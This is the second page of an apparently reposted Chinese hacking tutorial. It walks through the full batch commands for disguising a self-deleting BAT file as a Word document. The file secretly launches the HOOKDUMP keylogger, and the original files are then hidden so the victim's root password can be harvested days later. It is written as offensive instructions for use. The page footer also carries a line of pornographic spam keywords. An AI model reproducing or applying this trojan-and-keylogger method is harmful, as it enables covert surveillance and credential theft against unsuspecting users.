當前位置 : 首頁>軟件學(xué)院>網(wǎng)絡(luò)技術(shù)>黑客攻防>正文

攻擊技術(shù)：黑客怎樣入侵Linux系統(tǒng)

http://m.yibo1263.com　2009-8-20 6:52:48 　來源:網(wǎng)絡(luò)整理　編輯:葉子

　　該動手了，我的目標就是讓它下次打開時誤中我的陷阱而運行我藏的木馬。我這次用的是一個鍵盤計錄軟件HOOKDUMP，我覺得它挺好的，價錢實惠，量也足……　對不起，說習(xí)慣了，應(yīng)該是它不僅記錄下全部擊鍵，還記錄下打開或關(guān)掉了什么程序、按過什么按紐、用過什么菜單……　總之，它的記錄讓你就和你站在他身后看他操作計算機一樣詳細了。您要問那么多木馬你為啥裝這個?要知道無論是中國的冰河、netspy還是外國的netbus、BO，都被各種殺毒軟件列為頭號偵查對象，而一個root的機器上可不可能沒裝殺毒軟件?還是HOOKDUMP好，小小的，不起眼，不過如果大家都用只怕我再用它的機會就少了……

　　>copy hookdump.* i:

　　補充一點：上傳前先編好它的hookdump.ini文件，置為隱藏方式運行，不然root一運行屏幕上蹦出一大窗口可就……。

　　然后再在自己的機器上編一個同名的BAT文件：X月工作計劃.BAT

　　>edit c:X月工作計劃.BAT

　　@echo off

　　hookdump

　　attrib -h X月工作計劃.doc

　　C:Program FilesMicrosoftOfficeWinword X月工作計劃.doc

　　attrib -h temp.bat

　　del temp.pif

　　del temp.bat

　　看明白了吧?root運行了這個BAT文件實際上就是先運行木馬，再調(diào)用WINWORD文件打開它想開的這個文件，然后自我刪除，也許它機器上WINWORD的位置不同，那調(diào)用就會失敗，不過不要緊，反正BAT會馬上刪除，他會以為是自己的誤操作。

　　這時你的C驅(qū)根目錄就有了這么一個BAT文件，它是一個方形的圖標，和那個WORD文件大相徑庭，root怎么會運行它呢?沒關(guān)系，在這個文件上點右鍵，點屬性，在“程序”欄選“更改圖標”不就行了嗎?WORD的圖標在你機器C:Program FilesMicrosoftOffice中。還要將“運行”改為“最小化”，“退出時關(guān)閉”打上勾，這樣才能保證在運行時一點跡象也沒有。事實上這個 BAT文件變成了兩個，還有一個PIF文件就是它的圖標。

　　把這兩個文件傳上去：

　　>copy X月工作計劃.bat i:

　　>copy X月工作計劃.pif i:

　　然后把它的文件和自己的文件都藏起來：

　　>attrib +h X月工作計劃.doc

　　>attrib +h X月工作計劃.bat

　　這樣，root的“公文包”里只剩下一個和原來一模一樣的WORD圖標，他做夢也沒想到這已變成了一個BAT文件。然后可以喘口氣了，讓我們靜靜的等……

　　幾天后，我進入這個工作站，取下記錄下來的擊鍵記錄，找出root的口令，進入主機。

本新聞共2頁,當前在第2頁 1 2

【收藏】【打印】【進入論壇】

相關(guān)文章：

亚洲AV无码乱码在线观看不卡|最新大伊香蕉精品视频在线|亚洲不卡av一区二区|国产美女无遮挡免费